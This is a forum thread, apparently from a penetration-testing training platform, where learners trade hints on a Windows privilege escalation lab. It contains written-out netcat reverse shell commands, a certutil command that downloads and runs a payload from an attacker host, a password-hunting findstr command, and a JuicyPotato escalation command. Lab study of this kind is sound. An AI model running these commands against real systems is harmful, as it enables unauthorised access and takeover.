Windows Privilege Escalation Skills Assessment - Part I (Question N.2)

I solved all question but not the second question:
Find the password for the ldapadmin account somewhere on the system.
Where is this password in the system? I search with Lazagne and other string command.
Tnx

Hi im actually earlier in this module on the “vulnerable services” section. were you able to get that exploit described in that lesson working?

Yes tnx

Ya I managed to get it to work had to use the pwnbox. Think firewall or network setting on my normal VirtuaL machine I was using was blocking the connection for the reverse shell.

Though could use a tip on the credential hunting section. For the question

“Search the file system for a file containing a password. Submit the password as your answer.”

I did indeed found a file containing a password when searching C:\Users\htb-student\Documents\

But when I enter that password flag its not being accepted is there another one or is this somekind of error in the module?

What is the section and type here the password you found

In Windows Privilege Escalation module - on the section titled “credential hunting”

found stuff.txt at

c:\Users\htb-student\Documents\stuff.txt

contains the string <password: l#-x9r11_2_GL!>

I see my note.
I use this command
**PS C:\htb> findstr /SIM /C:“password” *.txt *.ini *.cfg .config .xml
I find xml element. I read this.

ok thanks you I ended up finding the correct password. I realized there are many passwords for this section. and found the right one.

ok Im now on Windows Privilege Escalation Skills Assessment - Part I.

I’m stuck at the beginning on the initial foot hold. I see the website being hosted by the target is vulnerable to windows CMD command injection.

Lesson tells us to exploit this and get a reverse shell though couple reverse shells I have tried all failed so far.

After setting up a netcat listener ive tried injecting commands

nc.exe -e cmd “attack ip” “port”

nc.exe -e cmd.exe “attack ip” “port”

certutil.exe -urlcache -split -f http://“attack ip”:“port”/beacon.exe C:\Windows\Temp\beacon.exe & C:\Windows\Temp\beacon.exe

non seemed to work not gettting reverse shell

Can you give me a tip on this?

Hi man, you want information about the skill assessment in windows privilege escalation module (question 1)?

Yes got some help and found a way to get a reverse shell. Though now I am trying to escalate privileges.

Obvious paths of using juicypotato or printspoofer dont seem to work. ANy tip on the privilege escaltion path?

Yes so use juicypotato and one of this process:

Thanks for the hint. Im newb when it comes to windows what am I supposed to do with all these clsid? Only know how to use the Juicypotato.exe on the main page.

Ok read how to use the clsid using the -c switch but after trying a few of them non of them worked still getting

Input

c:\Windows\Temp\JuicyPotato.exe -l 53375 -c 0134A8B2-3407-4B45-AD25-E9F7C92A80BC -p c:\windows\system32\cmd.exe -a “/c c:\Windows\Temp\nc.exe 10.10.14.135 443 -e cmd.exe” -t *

Output

Testing 0134A8B2-3407-4B45-AD25-E9F7C92A80BC 53375
COM → recv failed with error: 10038

Try putzing the clsid into {} and quote the parameter

can you show an example? You mean like this? "-c {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} "

ok looking at the github page I found the right syntax. and ended up succesfully escalating privledges on the box.

1 Like

Did you find the password “somewhere” on the system?

Did you end up finding the answer to this question?

hi